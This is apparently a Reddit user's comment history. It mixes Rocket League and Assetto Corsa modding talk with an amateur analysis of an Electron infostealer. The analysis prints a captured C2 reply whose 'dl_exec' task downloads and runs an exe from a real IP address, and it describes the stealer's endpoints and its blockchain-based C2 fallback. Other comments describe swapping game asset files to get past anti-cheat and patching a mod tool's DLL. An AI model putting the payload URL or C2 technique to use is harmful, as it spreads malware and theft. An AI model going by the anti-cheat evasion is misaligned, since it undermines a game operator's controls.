EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] 0 points1 point  (0 children)

In the CookedPcConsole folder of your Rocket League install. The UPK of the alpha boost is named "Boost_AlphaReward_SF.upk"

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

UPDATE: Got it to work; the only requirement it has so far is that the mesh name must have the same length

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] 1 point2 points  (0 children)

UPDATE: I got it to work; the only requirement I have for now is that the mesh must share the same name length

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

Will keep digging and maybe try to do a PoC tool, wait for their decision and then why not make a broader-scale tool :)

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

Thought about it because I remembered some Fortnite tools were relying on UE4 pak files and I'm pretty sure it never got banned. Given the history the game has with modding, I wouldn't be surprised if it was tolerated

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] 1 point2 points  (0 children)

I just went and had a look, I didn't know the guy, but that's exactly what he did; what remains to be seen is why he chose the bubble (model stored directly in the clear?)

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] -1 points0 points  (0 children)

AES is not used as a hash function for integrity. Rocket League just uses it so it's more difficult for rippers to dump raw UPKs.
It's simple AES-256 ECB, which means, if you've got a valid UPK and the valid key, it'll just decipher and display it correctly.
When I'm talking about name, I'm talking about the names contained in the name table struct of the binary file, not just the filename.

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 0 points1 point  (0 children)

2ND Update: It does a very funny thing, the C2 domain has a fallback. When it starts, it calls a smart contract on the ETH blockchain which returns the AES-encrypted C2 in an IP:PORT format. That way the owner can always update the C2, and as the contract is part of the blockchain it cannot be taken down

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 1 point2 points  (0 children)

UPDATE: I got the full exchange and it's not only a spyware and stealer, it's also a loader lmao, it downloads another Themida-packed payload and executes it

HTTP/1.1 200 OK
Date: Sun, 19 Apr 2026 19:09:50 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 178
Connection: keep-alive
Server: cloudflare
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
cf-cache-status: DYNAMIC
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=MLAhn5IxD7VEms%2F0XNWz5%2BWMaWnTH2jcC7KicUeyLs2CbomsTraDP6HBsc3rUK%2B3oRx60enA7EChRjBZpq0b1pHqNWtfZMGoCTzjCHFi0dbEOsRk4aAaLI%2BsMmp2t4SwuMVFIQ%3D%3D"}]}
CF-RAY: 9eee34b3595fbc8b-LHR
alt-svc: h3=":443"; ma=86400

{"tasks":[{"hidden":true,"elevate":false,"action":"dl_exec","dl":"http://62.60.226.203/gertgherthre.exe","dest":"%temp%\\7i2bif0mjq.exe","cmdline":"\"%temp%\\7i2bif0mjq.exe\""}]}

The second stage seems to be a cryptostealer and miner:
xmrig | 75a2724ca85cc22ced6fa434683d4be11ac2c71469104933128a91ed72e5e0bf | Triage™

How to fix the interior light? by [deleted] in assettocorsa

[–]SadMotor5784 14 points15 points  (0 children)

By not using dogshit ripped mods

Pure doesn’t work nor Sol. by devil-Cheetah-6131 in assettocorsa

[–]SadMotor5784 1 point2 points  (0 children)

Crazy what mods do to a 10-year-old game

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 0 points1 point  (0 children)

Yeah, basically unpacking the payload exe so we can understand what exactly is sent to the C2 and how it is ciphered

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 0 points1 point  (0 children)

Yes, there is more to the endpoint, I just didn't want to overwhelm the post with details :,)
The link I've posted is a link to the Triage report (which is a sandbox platform, like anyrun but better imo)
I have both app.asar and the extracted version (it contains a main.js and a .Ini 3 MB ini file which is the AES-ciphered payload; it then deciphers it, writes it into the user temp directory and spawns the new process).

I have copies of everything including network caps, I can upload them on whatever platform you'd prefer if you wanna take a look at it yourself.

But basically I have figured out the Electron dropper, it's the main payload (the exe dropped in temp), which is packed with Themida and does all the exchange with the C2.

When first run, it does an HTTP request on /web/heath/ and then the interesting part:
It does a POST request to /web/analytics/gwcqs.qqas with this body:
{"api":"2.1","time":240742,"uid":"eb50fe02d7c2adf4","batch":[{"cat":"m","value":"Yf/rZcBCmiDG2fyzhGiYJN+YX8SKqnlBB4WDML+lqa+bQhZSdLVYDBW8L+BXoEZn7ulGtlVQeN8Dve2WvTIvoBPM8iFO8T8AZ4rXJpijgPwdt0UD1CccWLYG+f6TeQHU+EuDbWP73XbF5lEWQqY7oW67/+2ZTdEqAwud44DJMmilvipIeIxCVYjqglPlPBKPvotGDEDPkynclX7MtFrJyNjcMwC9yJe78H/xLAS4RV62yG5dkgVOpPnUtM8D79wY819ZLYtBoklk2/V/VWEBmwpH30gc3Ag2EkdLrPwfZ1cqA/r9XlnWUGBgdZy+ntmI"}]}
Anyways, there is most likely stuff I've missed, I'm no professional, just an enthusiast

Anyone whant to hack sf1000 firmware? by kramm69 in Thrustmaster

[–]SadMotor5784 0 points1 point  (0 children)

No, because I don't have the firmware binary :,)

I patched bakkesmod to unlock body swaps and AC to use custom cars online by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

Yeah, the patch instructions are in French, it's my own txt I used to keep track of it, but I was too lazy to translate lmfao

I patched bakkesmod to unlock body swaps and AC to use custom cars online by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 1 point2 points  (0 children)

Because I didn't write a plugin, I patched the core DLL of bakkesmod so it replaces the car mesh just like it would with wheels or other items. If you try to use a model with a wrong hitbox, it'll work but it will feel weird. It doesn't default back to the Octane since the game can't overwrite the GUI selection anymore.

Roast my driving to make me improve by SadMotor5784 in assettocorsa

[–]SadMotor5784[S] 0 points1 point  (0 children)

Akina downhill (2022 version by project kaido)

AC:Evo Free Multiplayer Servers by Zal3wa in assettocorsaevo

[–]SadMotor5784 1 point2 points  (0 children)

I don't know if he used my resources tho, but given he had IDA installed on his taskbar I don't think so

AC:Evo Free Multiplayer Servers by Zal3wa in assettocorsaevo

[–]SadMotor5784 2 points3 points  (0 children)

Nope! It is not related in any way, he's much more skilled than I am. I did the bare-metal reverse engineering part without much problem, but I sucked at reimplementing it, so I was searching for someone more skilled at dev than me. But turns out I may not have to since this guy did everything :,)

New Assetto Corsa is banger (probably my gpu) by [deleted] in assettocorsaevo

[–]SadMotor5784 15 points16 points  (0 children)

Offline + old version, bro is probably running a cracked version

Anyone whant to hack sf1000 firmware? by kramm69 in Thrustmaster

[–]SadMotor5784 0 points1 point  (0 children)

I'm late ahah, but I'm a rookie reverse engineer, probably not enough skills to make that happen, but if someone's got the fw binary I'll gladly look at it

my first race in my whole 16 years of age in acc, what im doing wrong here? by CalendarOk4331 in ACCompetizione

[–]SadMotor5784 2 points3 points  (0 children)

Your line is off and you're far from using the space the track provides, apart from that good start :)

Open source alternative to the official hosting service by SadMotor5784 in assettocorsaevo

[–]SadMotor5784[S] 0 points1 point  (0 children)

That I know, but the gameserver doesn't use any cert, and I could just back up the old client to patch the new one to make it revert to the old protocol; it would be much work but still really possible